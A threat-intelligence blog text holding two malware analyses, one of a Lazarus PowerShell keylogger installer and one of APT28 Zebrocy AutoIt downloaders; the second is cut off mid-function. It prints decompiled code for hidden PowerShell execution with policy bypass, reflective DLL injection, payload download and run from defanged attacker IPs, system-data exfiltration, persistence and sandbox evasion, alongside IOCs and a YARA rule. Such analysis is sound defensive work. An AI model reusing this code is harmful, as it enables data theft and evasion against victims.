Let’s Learn: Dissecting Lazarus PowerShell PowerRatankba.B, Installer Script & Keylogger: Pakistan Version

Goal: Document and review the latest Lazarus PowerRatankba.B, PowerShell installer script leading to the 64-bit keylogger version (Pakistan version).

Source:
Lazarus PowerShell PowerRatankba.B "REG_LOCALDATA.ps1"(Pakistan)
MD5: c9ed87e9f99c631cda368f6f329ee27e
Lazarus PowerShell installer script "hm.ps1" (Pakistan)
MD5: 5cc28f3f32e7274f13378a724a5ec33a
Keylogger 64-bit (x64) "capture_x64.dll'(Pakistan)
MD5: 2025D91C1CDD33DB576B2C90EF4067C7

Outline:

I. Background & Executive Summary
II. PowerShell PowerRatankba.B "REG_LOCALDATA.ps1" (Pakistan)
III. Lazarus PowerShell Installer Script  (Pakistan)
A. Main Code Flow
B. "DoProcess" Function
C. "shell_script" 
IV. Lazarus Keylogger 64-bit (x64) "capture_x64.dll'  (Pakistan)
V. Yara Signature
Analysis
I. Background & Executive Summary
This analysis is a continuation of the reporting on the recent Lazarus toolkits. It is notable that the latest discovered PowerRatankba.B toolkit, uploaded from Pakistan, is almost identical to the Chilean Redbanc incident with the slightly different hardcoded URI structure ending on “cgetpsa” and “cgetruna” on the same server, while the recent uploaded Lazarus PowerShell installer (and its keylogger)¬†bears similarity¬†to the ones shared by the Vietnamese CERT. It is¬†possible that the Lazarus group was targeting financial institutions both in Chile and Pakistan while deploying the same command-and-control server and before in Vietnam.
Before diving¬†deeper into the Lazarus PowerShell installation and keylogger analysis, I highly recommend reading the Norfolk Infosec blog titled “A Lazarus Keylogger- PSLogger” detailing the Lazarus older version of the similar script, installation, and the keylogger DLL component.¬†As noted, the script and its installation do not contain the command-and-control protocol, which likely means that the group exfiltrates the screenshot and keylogger information at a later point via other means.
I have also uploaded MISP JSON and CSV associated with the Lazarus tools (Pakistan) to GitHub k-vitali/apt_lazarus_toolkits for detection and mitigation of this threat.
II.¬†PowerShell PowerRatankba.B “REG_LOCALDATA.ps1”¬†(Pakistan)
The latest identified PowerRatankba.B, uploaded from Pakistan, represents a reconnaissance Lazarus tool with the almost identical script and logic to the Chilean Redbanc incident (with the same server) with the exception of the URI structure and lack of the commented additional server.
Screen Shot 2019-02-24 at 10.34.03 PM

III.¬†Lazarus PowerShell Installer Script “hm.ps1”¬†(Pakistan)

A. Main Code Flow
The main function setup obtains the process list leveraging the native PowerShell command obtaining the current process id list with process names via “Get-Process | Select-Object id,name” then convert the process name to lower case and sets the boolean “$bIsInjected=$false” and then if the process name matches ‘explorer’, the malware enters “DoProcess function passing -Target_PID process id of the process, then exiting.
The main script setup is as follows:

////////////////////////////////////////////////////
////// Lazarus PowerShell installer main flow //////
////////////////////////////////////////////////////
OwnPath = $MyInvocation.MyCommand.Path;
$filesize = (Get-Item $OwnPath).length
$resetBuf = New-Object byte[] $filesize
[System.IO.File]::WriteAllBytes($OwnPath, $resetBuf)
Remove-Item -Path $OwnPath -Force -Recurse
...
$cnt_read = 0;
while($true)
{
$process_list = Get-Process | Select-Object id,name
foreach($iter in $process_list)
{
$process_name = $iter.name.ToLower();
$bIsInjected = $false;
if($process_name.CompareTo('explorer') -eq 0)
{
$ProID = $iter.Id
DoProcess -Target_PID $ProID
$ProcessListArray += $ProID
}
}
exit;
}

B. “DoProcess” Function
Essentially, the¬† “DoProcess” function passes the string type parameter $Target_PID and creating a file path with random characters as “C:\windows\temp\tmp[0-9A-F].ps1”.

////////////////////////////////////////////////////
///// Lazarus PowerShell 'DoProcess' Function //////
////////////////////////////////////////////////////
Function DoProcess
{
 param([String]$Target_PID)
 $szFileName = 'C:\windows\temp\tmp'+ -join ((48 .. 57) + (65 .. 70) | 
 Get-Random -Count 4 | % { [char]$_ }) + '.ps1';
 [String]$szCode = '$SScript = "' + $shell_script + '"; 
 [String]$NewStr = [System.Text.Encoding]::ASCII.GetString([System.Convert]

::FromBase64String($SScript.Replace("|","a")));$NewStr=$NewStr.Replace("EXECUTION_BINARY",
  "' + $InputString + '");$NewStr=$NewStr.Replace("PROCESSID", "' + $Target_PID + '");
  $NewBlock = [Scriptblock]::Create($NewStr);Invoke-Command -ScriptBlock $NewBlock;';
$szCode | Out-File -Encoding ascii $szFileName;
[String]$szArgList = '-ep bypass -file ' + $szFileName;
$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden - ArgumentList $szArgList;
}

 

The malware parses “shell_script”, replaces “|” for “a”, and base64 decodes and replaces “EXECUTION_BINARY” valuew with the base64 version of the keylogger 64-bit (x64) DLL version. Additinally, it replaces “PROCESSID” with argument “$Target_PID” writing to the resulting script to the tmp file and executing it via “Start-Process powershell.exe -PassThru -WindowStyle Hidden – ArgumentList -ep bypass -file C:\windows\temp\tmp[0-9A-F].ps1”.
C. “shell_script”¬†
The code itself is a PowerSploit’s PowerShell “Invoke-ReflectivePEInjection” reflectively injects a DLL into a remote process decoding the DLL base64 to binary.

////////////////////////////////////////////////////
///// Lazarus PowerShell 'shell_script' Excerpt ////
////////////////////////////////////////////////////
[String]$InputString = 'EXECUTION_BINARY';
[String]$idProcess = 'PROCESSID';
$injectionErrorCode = '';
$global:cmdRes = 0;
function Invoke-ReflectivePEInjection
 Function Get-Win32Types
 Function Get-Win32Constants
 Function Get-Win32Functions
 Function Sub-SignedIntAsUnsigned
 Function Add-SignedIntAsUnsigned
 Function Compare-Val1GreaterThanVal2AsUInt
...
$PEBytes = [System.Convert]::FromBase64String($InputString);
i ( $idProcess -eq 0)
{
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType
Void -ForceASLR;
}
else
{
Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType
Void -ForceASLR -ProcId $idProcess;
}

The malware¬†will force the use of¬†address space layout randomization (ASLR)¬†on the PE¬†loaded even if the PE indicates it does not support ASLR.¬†Additionally, the malware passes -FuncReturnType¬†the return type of the function being called in the DLL; the malware passes -ProcId parameter substituting $idProcess = ‘PROCESSID’ from the main flow loop code and substituting $InputString = ‘EXECTUION_BINARY’ to the dropped Lazarus 64-bit keylogger “capture_x64.dll”.
IV. Lazarus Keylogger 64-bit (x64) “capture_x64.dll’
The keylogger malware is 64-bit with the compilation timestamp¬†Monday, September 24 09:44:33 2018 UTC. It contains the same screenshot library, export function “Process,” same XZip library as the reported Vietnamese and Pakistani keylogger with the same setup as reported in detail by Norfolk Infosec.

Screen Shot 2019-02-24 at 10.34.44 PMV. Yara Signature: Keylogger

rule apt_lazarus_keylogger
{
   meta:
      description = "Detects possible Lazarus Keylogger"
      author = "@VK_Intel"
      date = "2019-01-25"
  strings:
      $s0 = "%s%s" fullword ascii wide
      $s1 = "[ENTER]" fullword ascii wide 
      $s2 = "[EX]" fullword ascii wide
      $s3 = "%02d:%02d" fullword ascii wide
      $dll0 = "PSLogger.dll" fullword ascii wide
      $dll1 = "capture_x64.dll" fullword ascii wide
      $exe = "PSLogger.exe" fullword ascii wide
condition:
uint16(0) == 0x5a4d and all of ($s*) and (1 of ($dll*) or $exe)
}

Let’s Learn: Progression of APT28 AutoIt Zebrocy Downloaders: Source-Code Level Analysis

Goal: Reverse engineer and analyze the APT28 Zebrocy/Zepakab AutoIt downloader implant, focusing on extracted AutoIt source code level analysis.
Source:

Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled)
MD5: d6751b148461e0f863548be84020b879
Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled)
MD5: 311f24eb2dda26c26f572c727a25503b
Zebrocy/Zepakab Downloader Implant (32-Bit x64 Compiled)
MD5: 7b1974e61795e84b6aacf33571320c2a
Zebrocy/Zepakab Downloader Implant (32-Bit x64 Compiled)
MD5: c2e1f2cf18ca987ebb3e8f4c09a4ef7e
Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled)
MD5: ec57bb4980ea0190f4ad05d0ea9c9447

Outline:

I. Background & Executive Summary
II. APT28 Zebrocy/Zepakab AutoIt Script Extraction
III. Zebrocy/Zepakab AutoIt Deeper Dive
A. Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled)
1. "_gapi_tcpsendfile()" Function
B. Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled)
1. "_giga()" Function
2. "_infosystemservice()" Function
3. "_mv()" Function
4. "_sofware()" Function
C. Zebrocy/Zepakab Downloader Implant (32-Bit x64 Compiled) 
1. "_getscreen()" Function
2. "_sendpost()" Function
D. Zebrocy/Zepakab Downloader Implant (32-Bit x64 Compiled)
1. "parsestring()" and "parsefile()" Functions
E. Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled)
IV. Yara Signature

I. Background & Executive Summary
The APT28 group continues to be developing and leveraging Zebrocy/Zepakab downloader implants. Here, I decided to recover and dissect its AutoIt scripts from its executable. APT28 is also known as Sofacy, Fancy Bear, STRONTIUM, Pawn Storm, and Sednit.
The malware downloaders are simple AutoIt compiled scripts with the added icons and are occasionally packed with UPX.
The Zebrocy/Zepakab Autoit downloader implants are simple and reminiscent of the other version coded in Golang, C++, and Delphi.
Malware analysis reveals the later usage of the hex-encoding functions to obfuscate certain strings within the APT28 malware.
APT28 Autoit downloaders rely on WinHTTP DLL library for clientserver communications. The reviewed older samples were compiled with Autoit for the 32-bit version, while the more recent ones were for the 64-bit one.
The downloaders simply create a fake GUI application mimicking Microsoft Word or PDF application with the fake message indicating password-protected documents to make Autoit icon is not visible with the¬†(“TrayIconHide”, 1) argument. In the later versions of this malware, the developer(s) also decided to obfuscate this string with hex-encoding presumably to avoid static detection on hidden Window AutoIt scripts.
Notably, on one occasion, the developer referenced the Microsoft Word document icon path from the machine as¬†“C:\works\old_progs\download\icons\DOC.ico.” The malware downloaders’ version information includes the English-language locale and LCID code of “2057”, which is a code page for English,¬†Great Britain language code.
One of the earlier downloader malware oddities includes a check for the software titled “Lamer.exe” as well with the VirtualBox related processes (“vmacthlp.exe”,¬†“vmtoolsd.exe”,¬†“vmusrvc.exe”), parallel desktop software processes (“prl_cc.exe”, “prl_tools.exe”, “SharedIntApp.exe”).
Update (2019-01-22): The newly observed Zebrocy AutoIt sample contained the timestamp compilation date of¬†Wednesday, January 16 06:10:59 2019 UTC introducing a Windows Management Instrumentation (WMI) host profiling method along with the odd name of execution function name of “crocodile().” Most importantly, the newer sample introduced the Base64-based encoding with the padded “F” (until 5)¬†on the reverse length of Base64 data blob and appended to the “img=” URI with the HTTPS server communication.
The malware servers appear to be have been located at the following Autonomous System Number (ASN):

AS49544 Qhoster
AS201011 Core-Backbone
AS29073 QuasiNetworks
AS9009 M247

The APT28 Autoit downloader execution can be tied to the following ATT&CK Enterprise Attack РAttack Pattern framework:

+ Command-Line Interface - T1059    
+ Scripting - T1064    
+ Registry Run Keys / Start Folder - T1060    
+ System Information Discovery - T1082
+ Windows Management Instrumentation - T1047
+ Exfiltration Over Command and Control Channel - T1041   
+ Standard Application Layer Protocol - T1071
+ Data Encoding - T1132

I have uploaded the decoded APT28 AutoIt scripts along with the MISP JSON and CSV indicators of compromise (IOC) extractions for further analysis and mitigation on GitHub at k-vitali/apt28_zebrocy_autoit_resource.
II. APT28 Zebrocy/Zepakab AutoIt Script Extraction
One of the possible interesting challenges includes the decompilation of x64-bit compiled AutoIT samples. 
One way you can tell if it is an AutoIt-compiled malware is through examining the resource section “RCData” for “SCRIPT” namespace with AU3 header.
Routinely, simple Exe2Au worked to retrieve the 32-bit version extracted AutoIt scripts, while the 64-bit required a small trick of recovering payloads via ResourceHacker (since Exe2Au does not support 64-bit versions), compiling them as .au3 scripts to the executable on a 32-bit machine, and then extracting them back via Exe2Au toolset. A similar method is referenced by @hexacorn here.
The steps are as follows:
1. Open the binary in Process Hacker and save the RCData ‘SCRIPT’ AU3 resource as binary¬†and rename ending in .au3.

2. Open Aut2Exe v3 and set them as source AutoIt .au3 and create a new executable, then extract the AutoIt script via “Exe2Aut.”

III. Zebrocy/Zepakab AutoIt Deeper Dive
A. Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled) (Mon Jan 25 06:27:36 2016)

The sample timestamp shows compilation timestamp of Monday, January 25,¬†06:27:36 2016 UTC with the version language code set to English, Great Britain. The sample leverages AutoIT GUI API (with hidden Tray Icon) and installs as “srvsml.exe” in “%APPDATA%\Microsoft\Network\SupportAssistanse”. Additionally, it sets up persistence in “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” as “srvmcc.exe”. It also¬†writes “0x110101” to “Software” key in “HKEY_CURRENT_USER\Software\Microsoft\ActiveAssistance”.
The notable addition includes the developer path to
as¬†“C:\works\old_progs\download\icons\DOC.ico” as well as setting time for the installed payloads modification time to “20131402.” It is also notable that the malware coder does not follow normal AutoIT FileSetTime conventions YYYYMMDD setting potential month outside¬†of the 12-month range. It is possible that it could be a developer mistake or misinterpreted month and day order (or European style).
Additionally, this malware includes anti-Virtual Machine (process blacklist) logic.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy 2 AutoIT Main Excerpt ;;;;;;;;;;;;;;;;;;;;;; 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$ms_word = GUICreate("Password                   ", 311, 86, -1, -1, BitOR($ws_caption, $ws_popup, $ws_sysmenu), $ws_ex_dlgmodalframe)
GUISetIcon("C:\works\old_progs\download\icons\DOC.ico", -1)
$input1 = GUICtrlCreateInput("", 8, 16, 297, 21, BitOR($gui_ss_default_input, $es_password))
$button1 = GUICtrlCreateButton("OK", 120, 48, 83, 25)
$button2 = GUICtrlCreateButton("Cancel", 216, 48, 83, 25)
Opt("TrayIconHide", 1)
$runex = "\srvsml.exe"
$aar = ProcessList()
_vm($aar)
$f = FileExists(@AppDataDir & "\Microsoft\Network\SupportAssistanse" & $runex)
If $f = 0 Then
 RegWrite("HKEY_CURRENT_USER\Software\Microsoft\ActiveAssistance", 
"Software", "REG_SZ", "0x110101")
 $hopen = _winhttpopen()
 $hconnect = _winhttpconnect($hopen, "hxxp://80[.]255[.]6[.]5/")
 $hrequest = _winhttpsimplesendrequest($hconnect, Default, 
"/daily-update-certifaicates52735462534234/update-15.dat")
 $data = _winhttpsimplereaddata($hrequest)
 RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", 
"MSCertificates", "REG_SZ", @TempDir & "\srvmcc.exe")
 $hfileonce = FileOpen(@AppDataDir & "\Microsoft\Network\SupportAssistanse" & $runex, 2 + 16 + 8)
 FileWrite($hfileonce, $data)
 FileClose($hfileonce)
 $hfile = FileOpen(@TempDir & $runex, 2 + 16)
 FileWrite($hfile, $data)
 FileClose($hfile)
 _winhttpclosehandle($hrequest)
 _winhttpclosehandle($hconnect)
 _winhttpclosehandle($hopen)
 FileSetTime(@AppDataDir & "\Microsoft\Network\SupportAssistanse" & $runex, "20131402", 1)
 FileSetTime(@AppDataDir & "\Microsoft\Network\SupportAssistanse"       & $runex, "20131402")
 Run(@AppDataDir & "\Microsoft\Network\SupportAssistanse" & $runex)
 $name = _getname()
 $aar = ProcessList()
 $name_send = $name & "-" & @MON & "-" & @MDAY & ".tmp"
 $msg = _arraytostring($aar)
 Dim $ains
 _computergetsoftware($ains)
 $ainsmsg = _arraytostring($ains)
 $msg = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @MIN & "-" & @SEC & @CRLF & $msg & "===========================" & @CRLF & "===========================" & @CRLF & $ainsmsg
 $data = _gapi_tcpsendfile("80[.]255[.]6[.]5", "/LoG-statistic8397420934809/date-update9048353094c/StaticIpUpdateLog23741033.php", $name_send, $msg)
EndIf
GUISetState(@SW_SHOW)
While 1
 $nmsg = GUIGetMsg()
 Switch $nmsg
  Case $gui_event_close
   Exit
  Case $button1
   MsgBox(64, "Error", "Corrupt or Wrong Password!")
   ContinueLoop
  Case $button2
   Exit
 EndSwitch
WEnd

1. “_gapi_tcpsendfile()” Function
The malware TCP AutoIT library to send and retrieve files leveraging TCPStartup, TCPNameToIP, TCPTimeout, TCPConnect, TCPSend, TCPRecv, and TCPShutdown.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy 2 AutoIT "_gapi_tcpsendfile" ;;;;;;;;;;;;;;;;;;;;;; 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func _gapi_tcpsendfile($host, $hrv, $file, $msg)
 $sparametrs = "-----------------------------7dd177a260412" & @CRLF
 $sparametrs &= 'Content-Disposition: form-data; name="/Content/Files/"' & @CRLF
 $sparametrs &= @CRLF
 $sparametrs &= "./" & @CRLF
 $sparametrs &= "-----------------------------7dd177a260412" & @CRLF
 $sparametrs &= 'Content-Disposition: form-data; filename="' & $file & '"' & @CRLF
 $sparametrs &= "Content-Type: " & $file & @CRLF
 $sparametrs &= @CRLF
 $sparametrs &= $msg & @CRLF
 $sparametrs &= "-----------------------------7dd177a260412--" & @CRLF
 Local $srequest = "POST /" & $hrv & " HTTP/1.1" & @CRLF
 $srequest &= "Content-Type: multipart/form-data; boundary=---------------------------7dd177a260412" & @CRLF
 $srequest &= "Host: " & $host & @CRLF
 $srequest &= "Content-Length: " & StringLen($sparametrs) & @CRLF
 $srequest &= "Cache-Control: no-cache" & @CRLF
 $srequest &= @CRLF
 $srequest &= $sparametrs
 If TCPStartup() == 0 Then Return -1
 Local $sip = TCPNameToIP($host)
 If @error Then Return -2
 Opt("TCPTimeout", 1000)
 Local $nmaxtimeout = 30
 Local $isocket, $ierror
 While 1
  $isocket = TCPConnect($sip, "80")
  If @error = 10060 Then
   $nmaxtimeout -= 1
   If $nmaxtimeout < 0 Then
    Return False
   EndIf
   ContinueLoop
  ElseIf @error Then
   $ierror = @error
   Return False
  Else
   ExitLoop
  EndIf
 WEnd
 $i = 0
 TCPSend($isocket, $srequest)
 Local $sdata = "", $itimer = TimerInit(), $timewait = ((1000 * (StringLen($srequest) / 1024)) + 30000)
 Do
  $sbuffer = TCPRecv($isocket, 2048, 1)
  $ierror = @error
  If $sbuffer Then
   $sbuffer = BinaryToString($sbuffer)
   $sdata &= $sbuffer
   $timewait = 2000
   $itimer = TimerInit()
  EndIf
 Until $ierror  0 OR TimerDiff($itimer) > $timewait
 TCPShutdown()
 Return $sdata
EndFunc

B. Zebrocy/Zepakab Downloader Implant (32-Bit x86 Compiled) (Mon May 11 19:06:01 2016)

This APT28 downloader implant is a 32-bit version, which AutoIT original script can be simply recovered via Au2Exe.
The sample timestamp shows compilation timestamp of Monday,¬†May 11 19:06:01 2016 UTC. The sample installs in %APPDATA%\Microsoft\Internet Explorer\Quick Launch\¬†as “srvcron.exe” with the hidden icon as the fake Microsoft Word application.
Additionally, this malware includes anti-Virtual Machine (process blacklist) logic but also parses for known anti-virus sandboxes.

The list of all relevant functions follows:

_giga()
_infosystemservice()
_mv()
_sofware()

The relevant main function is below.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;; Zepakab/Zebrocy AutoIT Setup Excerpt ;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Global Const $es_password = 32
Global Const $gui_ss_default_input = 128
Global Const $gui_event_close = -3
Global Const $ws_sysmenu = 524288
Global Const $ws_caption = 12582912
Global Const $ws_popup = -2147483648
Global Const $ws_ex_dlgmodalframe = 1
If NOT (IsDeclared("$cI_CompName")) Then
EndIf
Opt("TrayIconHide", 1)
$ms_word = GUICreate("Password", 311, 86, -1, -1, BitOR($ws_caption, $ws_popup, $ws_sysmenu), $ws_ex_dlgmodalframe)
$input1 = GUICtrlCreateInput("", 8, 16, 297, 21, BitOR($gui_ss_default_input, $es_password))
$ok = GUICtrlCreateButton("OK", 120, 48, 83, 25)
$cancel = GUICtrlCreateButton("Cancel", 216, 48, 83, 25)
Global $sname = _mv()
$sexname = "srvcron.exe"
$exist = FileExists(@AppDataDir & "\Microsoft\Internet Explorer\Quick Launch\" & $sexname)
GUISetState(@SW_SHOW)
OnAutoItExitRegister("_Giga")
While 1
$nmsg = GUIGetMsg()
Switch $nmsg
Case $gui_event_close
GUIDelete($ms_word)
_infosystemservice
("hxxp://194[.]187[.]249[.]126", "/security-services-DMHA-group/info-update-version/id77820082.php", $sname & "__" & @MON & @MDAY & @MIN & ".tmp", _sofware()) Sleep(3000)
ExitLoop
Case $ok
MsgBox(64, "Open file error!", "The password is incorrect. Cannot open the document!")
GUIDelete($ms_word)
_infosystemservice
("hxxp://194[.]187[.]249[.]126", "/security-services-DMHA-group/info-update-version/id77820082.php", $sname & "__" & @MON & @MDAY & @MIN & ".tmp", _sofware()) Sleep(3000)
ExitLoop
Case $cancel
GUIDelete($ms_word)
_infosystemservice
("hxxp://194[.]187[.]249[.]126", "/security-services-DMHA-group/info-update-version/id77820082.php", $sname & "__" & @MON & @MDAY & @MIN & ".tmp", _sofware())
Sleep(3000)
ExitLoop
EndSwitch
WEnd

a. “_giga()” Function

The _giga() function calls the server and saves the second-stage payload to %TEMP%\ as “srvcass.exe” and creates the payload quick launch and runs via it. It installs in registry to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce” as “IESecurity.” Additionally, it sets up “DriverID” entry value to 11×00110011 in “HKEY_CURRENT_USER\Software\Microsoft\Drivers”.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy AutoIT "_giga" Function ;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func _giga()
 $hopen = _winhttpopen()
 $hconnect = _winhttpconnect($hopen, "hxxp://194[.]187[.]249[.]126/")
 $hrequest = _winhttpsimplesendrequest($hconnect, Default, 
"/security-services-DMHA-group/id-pid919/1SQL5-5database-update/release-554211/updater-service.dat")
 $data = _winhttpsimplereaddata($hrequest)
 $hfileonce = FileOpen(@AppDataDir & "\Microsoft\Internet Explorer\Quick Launch\" 
& $sexname, 2 + 16 + 8)
 FileWrite($hfileonce, $data)
 FileClose($hfileonce)
 $hfile = FileOpen(@TempDir & "\srvlcass.exe", 2 + 16)
 FileWrite($hfile, $data)
 FileClose($hfile)
 _winhttpclosehandle($hrequest)
 _winhttpclosehandle($hconnect)
 _winhttpclosehandle($hopen)
 Run(@AppDataDir & "\Microsoft\Internet Explorer\Quick Launch\" & $sexname)
 RegWrite
("HKEY_CURRENT_USER\Software\Microsoft\Drivers",_ "DriverID", "REG_SZ", "11x00110011")
 RegWrite
("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce", "IESecurity",
 "REG_SZ", @TempDir & "\srvlcass.exe")
EndFunc

2. “_infosystemservice()” Function
The¬†_infosystemservice() function simply passes the collected information to the server on the “info=” parameter with “.tmp&statistic=” data parameters

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy AutoIT "_infosystemservice" Function ;;;;;;;;;;;;;;;;;;;;;; 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func _infosystemservice($host, $hrv, $name, $data_s)
 $url = $host & $hrv
 $ohttp = ObjCreate("WinHttp.WinHttpRequest.5.1")
 $ohttp.open("POST", $url)
 $ohttp.setrequestheader("Content-Type", "application/x-www-form-urlencoded")
 $adata = "info=" & $name & ".tmp&statistic=" & $data_s
 $ohttp.send($adata)
 $ohttp.waitforresponse
 $response = $ohttp.responsetext
 Return $response
EndFunc

3. “_mv()” Function
It is probably one of the more interesting Zebrocy/Zepakab downloader implant functions searching for a virtual machine and parallel desktop software along with the mystical “Lamer.exe.” Additionally, beyond the bot ID creation via “cmd.exe /U / VOL”, the malware searches for the following blacklisted hex-encoded bot ID with Volume Serial Number with first four left ComputerName characters in hex with the following values:

CC078550 414E544F // ANTO (ANTONY-PC) -> Kaspersky
0CE74E66 41444D49 // ADMI (ADMIN-PC) -> Comodo
64F3BF1F 54515564 // TQUd -> N/A
64F3BF1F 61776F64 // awod -> N/A
88FDB972 524F4745 // ROGE (ROGER-PC) -> Avira, Kaspersky, Comodo
B8EB467E 5657494E // VWIN -> N/A
D4BC89F6 57494E37 // WIN7 -> N/A
E00458AD 4245412D // BEA- -> N/A

These values represent known Virtual machines and/or sandboxes as identified by APT28 developers. I was able to crossreference of few of these as they were disclosed and discussed in the paper “The Adventures of AV and the Leaky Sandbox” by Amit and Itzik Kotler. The malware will execute if it detects either blacklisted process or the machine fingerprint (serial number + hex(computer name)) matches known sandboxes. Few of the sandboxes appear to belong Avira, Comodo, and Kaspersky.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy AutoIT "_mv" Function ;;;;;;;;;;;;;;;;;;;;;; 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func _mv()
 Dim $ssearch[11]
 $ssearch[10] = "Lamer.exe"
 $ssearch[1] = "vmacthlp.exe"
 $ssearch[2] = "vmacthlp.exe"
 $ssearch[3] = "vmtoolsd.exe"
 $ssearch[4] = "VBoxTray.exe"
 $ssearch[5] = "VBoxService.exe"
 $ssearch[6] = "prl_cc.exe"
 $ssearch[7] = "prl_tools.exe"
 $ssearch[8] = "SharedIntApp.exe"
 $ssearch[9] = "vmusrvc.exe"
 $ssearch[2] = "vmsrvc.exe"
 $ssearch[0] = UBound($ssearch)
 For $i = 1 To $ssearch[0] - 1
  $iindex = _arraysearch(ProcessList(), $ssearch[$i], 0, 0, 0, 1, 0, 0)
  If $iindex  -1 Then
   Exit
  EndIf
 Next
 Local $id, $soutput = ""
 $id = Run(@ComSpec & " /U /C VOL ", "", @SW_HIDE, $stderr_child + $stdout_child)
 While 1
  $soutput &= StdoutRead($id, False, False)
  If @error Then
   ExitLoop
  EndIf
  Sleep(10)
 WEnd
 $soutput = BinaryToString($soutput, 2)
 $aout = StringRegExp($soutput, "[A-Z0-9]{4}-[A-Z0-9]{4}", 1)
 $aout[0] = StringReplace($aout[0], "-", "")
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"CC078550414E544F", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"0CE74E6641444D49", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"64F3BF1F54515564", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"64F3BF1F61776F64", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"88FDB972524F4745", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex_(StringLeft(@ComputerName, 4)), 
"B8EB467E5657494E", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"D4BC89F657494E37", 0)
 If $kor = 1 Then Exit
 $kor = StringRegExp($aout[0] & _stringtohex(StringLeft(@ComputerName, 4)), 
"E00458AD4245412D", 0)
 If $kor = 1 Then Exit
 Return $aout[0] & _stringtohex(StringLeft(@ComputerName, 4))
EndFunc

4. “_sofware()” Function
The _sofware function parses for installed software walking through registry Uninstall key for “DisplayName”. It collects drive information (label and space), retrieves system information via cmd “systeminfo” output, and retrieves and concatenates processes into the system information.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy AutoIT "_sofware" Function ;;;;;;;;;;;;;;;;;;;;;; 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func _sofware()
 Local Const $reggetkey = 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
 Local $i = 1
 Local $asoft
